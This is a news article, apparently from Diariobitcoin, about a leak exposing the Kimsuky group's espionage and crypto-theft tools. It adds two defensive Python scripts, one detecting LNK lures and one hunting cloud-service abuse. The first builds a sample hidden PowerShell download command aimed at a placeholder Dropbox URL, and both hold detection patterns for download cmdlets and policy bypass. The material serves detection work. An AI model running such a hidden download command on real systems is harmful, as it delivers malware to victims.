Massive leak exposes the spying arsenal and crypto-theft tools of the Kimsuky hacker group
A member of the North Korean hacker group Kimsuky appears to have suffered a massive data leak, exposing tools and techniques used in cyber-espionage and cryptocurrency theft operations.
***
- The leak includes hundreds of GB of internal files, malware and campaign records.
- The data is attributed to an operator known as “Kim”, linked to Kimsuky.
- Researchers do not rule out links with Chinese actors.
An alleged member of the North Korean hacker group Kimsuky, classified as an advanced persistent threat (APT), appears to have been the victim of a massive data leak that exposes tools, internal files and records of its operations. According to security researchers at SlowMist, the leak amounts to hundreds of gigabytes and contains everything from browsing history to malware manuals, including tools aimed at cryptocurrency.
According to Cryptopolitan, the leaked information includes phishing campaign records and manuals for custom backdoors, as well as malicious programs such as the “Tomcat Kernel Backdoor”, modified variants of Cobalt Strike, the Ivanti RootRot tool and Android malware known as TOYBOX. These findings offer an unprecedented view of the group's offensive capabilities.
Origin of the leak
The incident, which is believed to have occurred at the beginning of June 2025, was traced to two compromised systems linked to an operator who used the alias “Kim”. One was a Linux workstation running Deepin 20.9, apparently used to develop malware. The other was a public VPS server that hosted spear-phishing material, such as fake login portals and command-and-control links.
The attackers responsible, who identify themselves as “Saber” and “cyb0rg”, claim to have accessed both systems, extracted their contents and published the information online. Although some indications tie “Kim” to known Kimsuky infrastructure, certain technical and linguistic elements point to a possible link with China, so the definitive origin remains unconfirmed.
History and tactics of the Kimsuky group
Active since at least 2012, Kimsuky has been associated with North Korea's Reconnaissance General Bureau. Its campaigns have targeted governments, research centers, defense contractors and universities, with the aim of collecting intelligence.
In 2025 the group has run operations such as DEEP#DRIVE, which used multi-stage intrusion chains. These began with compressed ZIP files containing Windows shortcuts (LNK) disguised as documents. Opening them executed PowerShell commands that downloaded malware from services such as Dropbox, using decoy documents to avoid detection.
In March and April 2025, Kimsuky embedded obfuscated VBScript and PowerShell code in malicious ZIP files. These scripts assembled commands covertly, deploying malware capable of logging keystrokes, capturing the clipboard and stealing cryptocurrency wallets stored in browsers such as Chrome, Edge, Firefox and Naver Whale.
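The two paragraphs above describe the same delivery pattern: a ZIP archive carrying a shortcut that masquerades as a document and, when opened, launches a hidden PowerShell download from a cloud service. A defender triaging mail attachments can flag that pattern statically before anything is opened. The script below is an added example written for this page, not code from the article, from Kimsuky or from any vendor; the archive it scans is constructed inline, the shortcut bodies are fakes that only share the LNK header with real shortcuts, and the Dropbox URL is a placeholder.

```python
"""Static triage of ZIP archives for document-lookalike LNK lures (added example).

Heuristic only: it extracts printable strings from each .lnk member and looks
for the traits described in the article (PowerShell launch, hidden window or
policy bypass, download cmdlets, cloud-hosting URLs, double extensions).
It does not parse the full MS-SHLLINK format.
"""
import io
import re
import zipfile

# Real shortcuts begin with HeaderSize 0x0000004C and the ShellLink CLSID
# {00021401-0000-0000-C000-000000000046}.
LNK_HEADER = b"\x4c\x00\x00\x00" + bytes.fromhex("0114020000000000c000000000000046")

SUSPICIOUS = {
    "powershell": re.compile(rb"powershell(\.exe)?\b", re.I),
    "hidden_or_bypass": re.compile(
        rb"-(w(indowstyle)?\s+hidden|(ep|executionpolicy)\s+bypass|nop|noprofile)\b", re.I),
    "encoded_command": re.compile(rb"-(e|ec|enc|encodedcommand)\s", re.I),
    "download": re.compile(
        rb"(Invoke-WebRequest|iwr|DownloadString|DownloadFile|Start-BitsTransfer)", re.I),
    "cloud_url": re.compile(
        rb"https?://[^\s\"']*(dropbox\.com|github\.com|githubusercontent\.com)", re.I),
}
# A shortcut named like "invitation.pdf.lnk" is trying to look like a document.
DOUBLE_EXT = re.compile(r"\.(pdf|docx?|xlsx?|pptx?|hwp)\.lnk$", re.I)
WEIGHTS = {"powershell": 2, "hidden_or_bypass": 2, "encoded_command": 3,
           "download": 3, "cloud_url": 2, "double_extension": 2}


def _strings(data: bytes) -> bytes:
    """Printable ASCII and UTF-16LE runs, the latter with NULs stripped."""
    ascii_runs = re.findall(rb"[\x20-\x7e]{4,}", data)
    wide_runs = [r.replace(b"\x00", b"")
                 for r in re.findall(rb"(?:[\x20-\x7e]\x00){4,}", data)]
    return b"\n".join(ascii_runs + wide_runs)


def scan_lnk(name: str, data: bytes) -> list[str]:
    """Return the list of indicator labels that fire for one shortcut."""
    if not data.startswith(LNK_HEADER):
        return ["not_a_shortcut_header"]
    text = _strings(data)
    hits = [label for label, pat in SUSPICIOUS.items() if pat.search(text)]
    if DOUBLE_EXT.search(name):
        hits.append("double_extension")
    return hits


def scan_zip(zip_bytes: bytes) -> dict[str, list[str]]:
    """Map every .lnk member of the archive to its indicator list."""
    report = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir() or not info.filename.lower().endswith(".lnk"):
                continue
            report[info.filename] = scan_lnk(info.filename, zf.read(info))
    return report


def risk_score(indicators: list[str]) -> int:
    """Weighted sum; anything above ~5 deserves a human look."""
    return sum(WEIGHTS.get(i, 0) for i in indicators)


def build_sample_zip() -> bytes:
    """Constructed archive: one ordinary shortcut and one lure-style shortcut.
    The command line is a placeholder assembled for this example, not a payload."""
    benign = LNK_HEADER + b"\x00" * 40 + \
        "C:\\Program Files\\Notepad++\\notepad++.exe".encode("utf-16-le")
    lure_cmd = ('powershell.exe -w hidden -ep bypass -c "Invoke-WebRequest '
                'https://www.dropbox.com/s/EXAMPLE-PLACEHOLDER/lure.txt '
                '-OutFile $env:TEMP\\lure.txt"')
    lure = LNK_HEADER + b"\x00" * 40 + lure_cmd.encode("utf-16-le")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Notepad.lnk", benign)
        zf.writestr("Conference_Invitation.pdf.lnk", lure)
        zf.writestr("readme.txt", b"constructed sample archive")
    return buf.getvalue()


if __name__ == "__main__":
    for member, hits in scan_zip(build_sample_zip()).items():
        print(f"{member}: score={risk_score(hits)} {hits}")
```

The UTF-16LE pass matters: shortcut command lines and arguments are stored as wide strings, so an ASCII-only string dump misses exactly the part of the file a lure hides its PowerShell in. The score is meant as a triage gate in front of sandbox detonation, not as a verdict.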
Evolution of tools
The group has adopted new techniques for covert remote access, such as customized RDP Wrapper modules and proxy malware. It has also used tools such as ForceCopy to extract credentials from browsers without triggering security alerts.
Another frequent tactic has been the abuse of legitimate platforms. In June 2025, a spear-phishing campaign against South Korea used private GitHub repositories to store malware and stolen data, while Dropbox served as a temporary repository. This allowed the group to camouflage its malicious activity within legitimate network traffic.
The leak targeting “Kim” represents an unusual blow against Kimsuky, which usually operates in the shadows. The exposure of its tools and methods could affect its operational capacity in the short term, although experts warn that the group will probably try to adapt and continue its cyber-espionage activities.
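Because GitHub and Dropbox traffic is normal in most networks, blocking those domains is rarely an option; the useful signal is which process is talking to them, what spawned it, and how much it uploads. The hunt below is an added example for this page, not the article's or any vendor's code: it reads endpoint network events as JSON lines (a constructed sample with assumed field names, not a real product schema) and flags cloud-service connections from script hosts, from binaries in user-writable paths, and large uploads from processes that are not a browser or the official sync client.

```python
"""Hunting for abuse of legitimate cloud services in endpoint telemetry (added example).

Input: JSON lines with ts, host, image, parent, dest, bytes_out (assumed schema).
Output: the events that deserve attention and why.
"""
import json

CLOUD_DOMAINS = {
    "github.com", "api.github.com", "raw.githubusercontent.com",
    "dropbox.com", "www.dropbox.com", "api.dropboxapi.com", "content.dropboxapi.com",
}
# Processes for which traffic to these services is expected in this (assumed) environment.
EXPECTED_IMAGES = {"chrome.exe", "msedge.exe", "firefox.exe", "whale.exe",
                   "dropbox.exe", "git.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "cmd.exe"}
UPLOAD_THRESHOLD = 5_000_000  # bytes out per event; tune to the environment

# Constructed sample telemetry. Hostnames, paths and sizes are invented.
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"ts": "2025-06-03T09:14:02Z", "host": "WS-17",
     "image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
     "parent": "C:\\Windows\\explorer.exe", "dest": "api.github.com", "bytes_out": 3120},
    {"ts": "2025-06-03T09:15:41Z", "host": "WS-17",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "parent": "C:\\Windows\\System32\\cmd.exe", "dest": "www.dropbox.com", "bytes_out": 1480},
    {"ts": "2025-06-03T09:16:05Z", "host": "WS-17",
     "image": "C:\\Users\\user\\AppData\\Local\\Temp\\svc.exe",
     "parent": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "dest": "api.github.com", "bytes_out": 8_200_000},
    {"ts": "2025-06-03T09:20:00Z", "host": "WS-22",
     "image": "C:\\Program Files\\Dropbox\\Client\\Dropbox.exe",
     "parent": "C:\\Windows\\explorer.exe", "dest": "content.dropboxapi.com",
     "bytes_out": 6_400_000},
])


def parse_events(text: str) -> list[dict]:
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event: dict) -> list[str]:
    """Reasons this event is suspicious; empty list means nothing fired."""
    if event["dest"].lower() not in CLOUD_DOMAINS:
        return []
    image, parent = basename(event["image"]), basename(event["parent"])
    lowered = event["image"].lower()
    reasons = []
    if image not in EXPECTED_IMAGES:
        reasons.append("unexpected_process")
    if image in SCRIPT_HOSTS or parent in SCRIPT_HOSTS:
        reasons.append("script_host_lineage")
    if "\\temp\\" in lowered or "\\appdata\\" in lowered:
        reasons.append("user_writable_path")
    if event["bytes_out"] >= UPLOAD_THRESHOLD and image not in EXPECTED_IMAGES:
        reasons.append("large_upload_from_unexpected_process")
    return reasons


def hunt(text: str) -> list[tuple[str, str, list[str]]]:
    """(ts, host, reasons) for every event with at least one reason."""
    findings = []
    for event in parse_events(text):
        reasons = evaluate(event)
        if reasons:
            findings.append((event["ts"], event["host"], reasons))
    return findings


if __name__ == "__main__":
    for ts, host, reasons in hunt(SAMPLE_EVENTS):
        print(ts, host, ", ".join(reasons))
```

The allow-list approach is deliberate: the sync client uploading several megabytes is normal, while an unsigned binary in `%TEMP%` spawned by PowerShell doing the same is the pattern worth paging on. Per-process baselines of bytes_out to these domains make the threshold far less arbitrary than a fixed number.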
Article written with the help of an AI content editor, edited by Angel Di Matteo / Diariobitcoin
